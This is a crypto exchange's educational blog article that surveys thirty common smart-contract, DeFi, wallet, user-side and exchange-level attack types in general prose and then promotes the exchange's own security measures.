SuperEx Educational Series: The 50 Most Common Blockchain Attack Types (Part 3 · Attacks 43–72)

Alright—didn’t expect this, but as we kept writing, we ended up exceeding the original plan of “50 attack types.” The list has now expanded to 72. To give everyone a more complete knowledge base, we’ve included the common security pitfalls seen across the market. If the first two parts focused on the underlying risks hidden in the network, cross-chain, oracle, and MEV layers, then Part 3 will zoom in on the battlefield closest to user assets—smart contracts, wallets, DeFi protocols, user-side attacks, and exchange-level systemic risks.

Losses from these attacks are often the most direct, the largest, and the most frequent, and they heavily depend on a development team’s security capability, system design philosophy, and the user’s own security awareness. Therefore, this part focuses on smart-contract-level + user-end-level attack methods, and proposes systematic defense recommendations from SuperEx’s perspective.

Smart Contract Vulnerability Attacks: Once On-Chain Rules Are Written Wrong, Hackers Benefit Forever (43–52)

Smart contracts are automatically executed mathematical protocols—but “automation” does not equal “security.” Once a vulnerability is deployed on-chain, it can exist permanently and may be impossible to fix. Below are the most common, most dangerous, and historically most costly smart contract attack patterns:

Reentrancy Attack

Reentrancy is one of the most iconic vulnerabilities in Ethereum history. It allows an attacker to repeatedly call a function before a contract finishes its original execution, ultimately enabling repeated withdrawals.

Classic case: The DAO attack caused $60 million in losses → leading to Ethereum forking into ETH and ETC.

Simplified attack flow: The attacker uses fallback() to re-enter the contract; at that moment, the contract balance has not yet been updated, enabling repeated asset extraction until the contract is drained. Many modern protocols are still broken by reentrancy, showing how stealthy and destructive it remains.

Integer Overflow / Underflow

Attackers exploit arithmetic overflow to construct scenarios such as:

Balances becoming negative and bypassing checks
Massive over-minting
Broken math logic enabling illegal execution
Solidity 0.8+ introduces default overflow checks, but many older contracts still rely heavily on SafeMath.

Approval Exploits

Approval exploits can allow user assets to be “permanently approved” to attackers. The ERC-20 approval mechanism itself is not safe—once a DApp requests approve(spender, uint256(-1)), an attacker may gain unlimited future transfer rights.

Many phishing sites and fake authorization pages steal tokens by abusing this.

Flash Loan Logic Exploit

Flash loans are not an “attack” themselves, but they amplify every vulnerability. Attackers borrow a huge amount instantly and then:

Manipulate prices
Steal collateral
Misuse liquidity pool logic
Rewrite contract state
Famous incidents: bZx, Harvest, Alpha Finance, PancakeBunny—losses exceeding hundreds of millions.

Storage Collision

Storage collision may be the biggest hidden danger of proxy contracts. Proxy upgradeability introduces structural risk. Attack paths include:

Incorrect storage slot mapping
Attackers overwriting critical variables (owner, admin)
Upgrade logic hijacking
Proxies are often considered “upgradeable but dangerous” structures.

Randomness Manipulation

On-chain randomness is not truly random, especially when derived from:

blockhash
timestamp
miner/validator-controlled values
Attackers can predict randomness and manipulate:
NFT raffles
Game outcomes
Jackpot drawings
Random sorting mechanisms
In Web3 games, 80% of attacks come from predictable randomness.

Access Control Failure

One of the most common security disasters:

onlyOwner written incorrectly
Exposed permissions
No restrictions on sensitive functions
Admin address leakage
Attackers directly call “mint,” “transfer,” or “upgrade contract” functions.

Business Logic Flaws

Some attacks are not “technical bugs,” but design problems, such as:

Incorrect liquidation logic
Wrong pricing formulas
Interest rate models being manipulated
AMM weight errors
Withdrawal order logic flaws
The 2022 Mango Markets incident was due to allowing users to tamper with collateral value.

Cross-contract Interaction Bugs

Contract A calls contract B, but B behaves differently than assumed, leading to:

Broken invariants
Incorrect states
Malicious counter-actions by receiver contracts
Common in long-tail projects; risks can be unpredictable.

Unchecked Return Values

Some ERC-20 tokens do not return bool, causing many protocols to mistakenly treat failed calls as successful. Attackers exploit this to steal millions.

DeFi Attacks: Design Flaws Can Be More Terrifying Than Code Bugs (53–59)

Remember airplane cabin doors—why are they always closed manually? Simple: the more precise and complex a structure is, the easier it is to fail. DeFi protocols are complex combinations of smart contracts, which leads to endless design vulnerabilities.

Below are the most typical and most deadly DeFi attack patterns:

Liquidity Drain Attacks

Attackers often only need:

A small deposit
Oracle or asset price manipulation
Draining the liquidity pool
Common in:
AMMs
Small-coin liquidity pools
Rug-pull projects

Multi-pool Arbitrage Exploit

Attackers use flash loans to manipulate multiple pools simultaneously, triggering:

Wrong liquidations
Wrong pricing
Wrong collateral valuation
The more complex the structure, the easier it is to disassemble and attack.

Liquidation Bot Frontrunning

Attackers act before liquidation occurs and use MEV to secure liquidation priority, maximizing their profits—often causing other users to suffer worse liquidations and even harming the protocol.

Collateral Ratio Manipulation in Lending Protocols

Attackers manipulate prices briefly to inflate collateral value, then:

Borrow large amounts of stablecoins
Cash out all collateral
Leave the protocol with bad debt
Beanstalk and Cream have suffered this repeatedly.

Algorithmic Stablecoin Attacks

Almost all algorithmic stablecoins collapsed in the past few years:

LUNA/UST
IRON
FEI
Basis Cash Attack methods include:
Overloading sell pressure
Death-spiral arbitrage by speculators
Oracle manipulation accelerating depegs Algorithmic stablecoins are considered one of the most structurally fragile designs.

Curve LP Token Manipulation

Curve’s StableSwap design is complex. If its formula is exploited:

Exchange ratios drift
LP token prices get manipulated
Users suffer in-pool slippage attacks

NFT Floor Price Manipulation

Attackers use:

Wash trading
Fake fills
High listing manipulation
Low-liquidity market manipulation
to distort floor prices, then arbitrage lending protocols like NFTfi.

Wallet / Key Attacks: Real Risks at Zero Distance From User Assets (60–65)

This category has the highest frequency in Web3 security.

Private Key Compromise

Most common causes:

Phishing sites
Fake wallet apps
Cloud storage leaks
Weak random number generators
Social engineering
Once a private key is stolen, assets are 100% unrecoverable.

Seed Phrase Phishing

Common methods:

Fake Ledger recovery sites
Fake exchange airdrop events
Fake airdrop claim pages
One seed phrase entry is enough for attackers to take everything.

Signature-Induced Attacks

Attackers don’t need the private key—only to trick users into signing a message, resulting in:

Permanent approvals
Mint permissions being transferred
Token approvals
Permit() attacks This is one of the most overlooked yet most dangerous actions in DeFi usage.

Fake Wallet / Fake Plugin Attacks

Attackers create:

Fake MetaMask
Fake Rabby
Fake Phantom After installation, they upload private keys or tamper with transaction targets.

Malicious Contract Approval

Users accidentally grant permanent approvals to attackers, causing funds to be drained instantly.

Address Poisoning

Attackers send small transfers from addresses visually similar to ones users often use, tricking users into copying the wrong address and sending large sums to the attacker.

User-side Attacks: Most Losses Aren’t Caused by Hackers, But by Users (66–69)

Phishing Attack

Common channels:

Telegram
Discord
Twitter
Fake airdrops
Fake official websites 80% of personal asset losses come from phishing.

Social Engineering Attacks

Attackers impersonate:

Official customer support
Project admins
Partners
Community staff to trick users into revealing private keys, seed phrases, or granting approvals.

Malicious Extensions

Some browser extensions can:

Read the clipboard
Steal cookies
Hijack network requests
Replace transaction targets Web3 users must avoid unknown extensions.

Keylogger + ClipMiner

ClipMiners replace copied addresses; keyloggers record seed phrase input. These are extremely stealthy and highly destructive.

Exchange & Platform-level Attacks: Once a Centralized Platform Is Breached, Losses Scale Without Limit (70–72)

SuperEx places extreme emphasis on system security and has maintained a record of 100% fund safety to date. However, exchange-level attacks remain highly dangerous because a single successful breach can mean billion-level losses. Common attack types include:

Hot Wallet Hack

Attackers break through private key management systems, ops permissions, servers, and whitelist restrictions to drain hot wallets—historically the biggest source of exchange losses.

Insider Attack

Internal employee risks include:

Illegally exporting private keys
Operating cold wallet processes
Modifying database balances
Interfering with withdrawal systems
Most compliant exchanges mitigate this via MPC + multi-step approvals.

API Key Leakage Attacks

Attackers use leaked APIs to:

Withdraw funds
Trade
Manipulate markets
Many users have lost tens of thousands of dollars by uploading API keys to GitHub.

How Does SuperEx Build System-level Defense?

SuperEx’s security philosophy can be summarized in one sentence: not shutting down risk, but resisting systemic risk chains.

SuperEx’s defense system includes:

1) Smart contract audits + dynamic risk scoring

All partnered DeFi products are audited first, and combined with on-chain historical behavior to build risk scores. Abnormal calls trigger protective fund-freezing mechanisms.

2) Super Wallet advantages

Super Wallet is a decentralized, multi-chain Hierarchical Deterministic Wallet, providing security for users interacting with the Dapp Open System and storing large crypto assets.

Super Wallet provides asset isolation and is not affected by platform security, politics, or other factors. Users keep their private keys—100% secure.

3) Transaction authorization risk scanning

Malicious contract approvals
Permit() risks
Phishing site interactions
and risk alerts for users.

4) Community security education (continuous)

Through the “SuperEx Educational Series,” we continuously raise user security awareness. This article and our previous educational content are all part of that effort.

Conclusion: The Future of Web3 Is the Future of Security

In Part 1, we saw the fragility of underlying architecture.
In Part 2, we saw systemic risks of cross-chain systems and oracles.
In Part 3, we saw the smart contract and wallet threats closest to users.

From protocols to users, from on-chain logic to cross-chain bridge structures, blockchain security has never been a single-point issue—it is a multi-layered, multi-component, interrelated ecosystem challenge.

SuperEx will continue building a globally leading security system and continuously updating a complete Web3 risk database to provide long-term value to the industry.